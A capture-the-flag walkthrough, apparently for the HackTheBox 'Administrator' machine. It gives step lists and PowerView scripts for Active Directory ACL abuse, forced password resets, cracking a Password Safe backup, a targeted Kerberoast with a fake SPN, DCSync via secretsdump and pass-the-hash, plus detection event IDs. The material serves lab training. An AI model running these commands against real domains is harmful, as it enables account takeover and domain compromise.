Foothold
1. enum4linux -u olivia -p ichliebedich -a 10.129.178.110
2. see that benjamin is a member of the Share Moderators local group
3. olivia is part of Remote Management Users
4. winrm into the machine
5. bloodhound
6. ethan can dcsync the DC
7. emily has generic write on ethan
8. olivia has generic write on michael
9. change password for michael and login as michael
10. michael has ForceChangePassword over benjamin (can reset benjamin's password without knowing the old one)
11. use rpcclient as michael
12. setuserinfo2 benjamin 23 password123!
13. FTP as benjamin to download Backup.psafe3
14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)
15. use passwordsafe to open up Backup.psafe3 to get emily’s password
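The same ACL-abuse chain (olivia -> michael -> benjamin) driven from PowerView instead of rpcclient, as an added example that is not part of the original notes. It assumes PowerView.ps1 is already loaded in a session that can reach the DC, and that the new passwords are free choices; every other name and value is taken from the steps above. The point it adds is to read the ACE back before abusing it and to confirm the reset afterwards.

```powershell
# Added example (PowerView, not part of the original notes): confirm the ACE before abusing it.
# Assumes PowerView.ps1 is loaded and the DC is reachable; names and the olivia password follow the notes.
$Domain = 'administrator.htb'
$Dc     = '10.129.178.110'

$OliviaPw = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Olivia   = New-Object System.Management.Automation.PSCredential("$Domain\olivia", $OliviaPw)

# 1. Which rights does olivia actually hold on michael? Only GenericAll or the
#    User-Force-Change-Password extended right allow a direct password reset;
#    plain GenericWrite does not, so check before assuming the reset will work.
$OliviaSid = (Get-DomainUser -Identity olivia -Domain $Domain -Server $Dc -Credential $Olivia).objectsid
Get-DomainObjectAcl -Identity michael -Domain $Domain -Server $Dc -Credential $Olivia -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier.Value -eq $OliviaSid } |
    Select-Object ActiveDirectoryRights, ObjectAceType, AceType

# 2. Reset michael's password (assumed new value) and build a credential for him.
$MichaelPw = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity michael -AccountPassword $MichaelPw -Domain $Domain -Credential $Olivia
$Michael = New-Object System.Management.Automation.PSCredential("$Domain\michael", $MichaelPw)

# 3. michael holds ForceChangePassword over benjamin, so the same cmdlet works from his context.
$BenjaminPw = ConvertTo-SecureString 'password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity benjamin -AccountPassword $BenjaminPw -Domain $Domain -Credential $Michael

# 4. Verify the reset took effect: pwdLastSet moves to now on a successful change.
Get-DomainUser -Identity benjamin -Domain $Domain -Server $Dc -Credential $Michael -Properties samaccountname,pwdlastset
```

Both resets are visible in the Security log (event 4724 on the DC), so on a real engagement record the accounts touched so the client can rotate them again afterwards.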
PrivEsc
1. Changing ethan's password outright only works if the right over him is GenericAll or ForceChangePassword; GenericWrite alone does not include the password-reset extended right. It is also noisy and locks ethan out, so prefer the targeted Kerberoast below, which only needs write access to servicePrincipalName.
2. Write a fake SPN to ethan as emily, then request a TGS for it
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)
# GenericWrite on ethan lets emily set any SPN; the value itself does not need to exist
Set-DomainObject -Credential $Cred -Domain administrator.htb -Identity ethan -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# pass the user object down the pipeline (the positional argument of Get-DomainSPNTicket is an SPN, not a username)
Get-DomainUser -Credential $Cred -Domain administrator.htb -Identity ethan | Get-DomainSPNTicket -Credential $Cred -OutputFormat Hashcat | fl
3. Kerberoast ethan based on this newly created SPN
impacket-GetUserSPNs -dc-ip 10.129.178.110 -request -outputfile kerberos administrator.htb/olivia   # prompts for olivia's password; any domain user can request the TGS
4. crack the hash (limpbizkit)
5. dc-sync to get admin hash
impacket-secretsdump administrator.htb/ethan:"limpbizkit"@10.129.178.110
6. login as Administrator with the dumped NT hash (pass-the-hash), then remove the fake SPN from ethan
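The targeted Kerberoast from the PrivEsc steps as one script with cleanup, added here as an example and not taken from the original notes. It assumes PowerView.ps1 is loaded and the DC is reachable; the fake SPN, the output file name and the try/finally structure are choices made for this example, while the account names and emily's password come from the steps above. What it adds over the notes is saving the original servicePrincipalName values and restoring (or clearing) them even if the ticket request fails.

```powershell
# Added example (PowerView, not from the original notes): targeted Kerberoast of ethan
# with the servicePrincipalName attribute saved and restored afterwards.
# Assumes PowerView.ps1 is loaded; the fake SPN and output path are arbitrary choices.
$Domain  = 'administrator.htb'
$Dc      = '10.129.178.110'
$EmilyPw = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Emily   = New-Object System.Management.Automation.PSCredential("$Domain\emily", $EmilyPw)
$Target  = 'ethan'
$FakeSpn = 'nonexistent/BLAHBLAH'

# 1. Record the existing SPNs so the object can be put back exactly as found.
$Before = Get-DomainUser -Identity $Target -Domain $Domain -Server $Dc -Credential $Emily -Properties serviceprincipalname
$OriginalSpns = @($Before.serviceprincipalname | Where-Object { $_ })   # empty for a plain user account
Write-Host "Existing SPNs on $Target : $($OriginalSpns -join ', ')"

try {
    # 2. GenericWrite lets emily write servicePrincipalName even though she cannot reset the password.
    Set-DomainObject -Identity $Target -Domain $Domain -Server $Dc -Credential $Emily -Set @{serviceprincipalname = $FakeSpn}

    # 3. Request a TGS for the fake SPN. The service ticket is encrypted with ethan's long-term key,
    #    so cracking it offline recovers his password. Pipe the user object in rather than passing a
    #    name as -SPN, so PowerView reads the SPN from the object itself.
    $Ticket = Get-DomainUser -Identity $Target -Domain $Domain -Server $Dc -Credential $Emily |
        Get-DomainSPNTicket -Credential $Emily -OutputFormat Hashcat
    $Ticket.Hash | Out-File -Encoding ascii .\ethan.kerberoast
    # offline: hashcat -m 13100 ethan.kerberoast rockyou.txt   (13100 = RC4 TGS-REP; AES tickets use 19600/19700)
}
finally {
    # 4. Cleanup runs whether or not the request succeeded: clear the attribute,
    #    or restore the original values if the account had any.
    if ($OriginalSpns.Count -eq 0) {
        Set-DomainObject -Identity $Target -Domain $Domain -Server $Dc -Credential $Emily -Clear serviceprincipalname
    } else {
        Set-DomainObject -Identity $Target -Domain $Domain -Server $Dc -Credential $Emily -Set @{serviceprincipalname = $OriginalSpns}
    }
}
```

Leaving a bogus SPN behind is the most common artefact of this technique; the DC logs the attribute change (event 5136 when directory auditing is on) and a TGS request for a user account SPN (event 4769 with a non-machine service name), which is what a defender would hunt for.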